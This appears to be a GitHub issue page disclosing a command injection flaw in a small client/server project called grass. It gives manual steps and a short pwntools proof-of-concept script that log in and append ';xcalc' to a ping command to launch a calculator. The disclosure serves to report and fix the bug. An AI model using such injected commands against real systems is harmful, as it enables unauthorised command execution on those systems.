You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I am able to open a calculator when executing the ping command.
Here's a PoC:
'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.
I am able to open a calculator when executing the ping command.
Here's a PoC:
'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.
Target: https://github.com/yannvon/grass
Exploit: Command Injection - Open calc through ping command
You can also run this by hand by doing:
make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc
'''
from pwn import *
server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = "login u1"
PASS = "pass p1"
CMD = "ping wowmuchinject;xcalc"
server = process(server_bin)
client = process([client_bin, IP,PORT])
client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
print("SERVER: {}".format(server.recvall()))
The text was updated successfully, but these errors were encountered: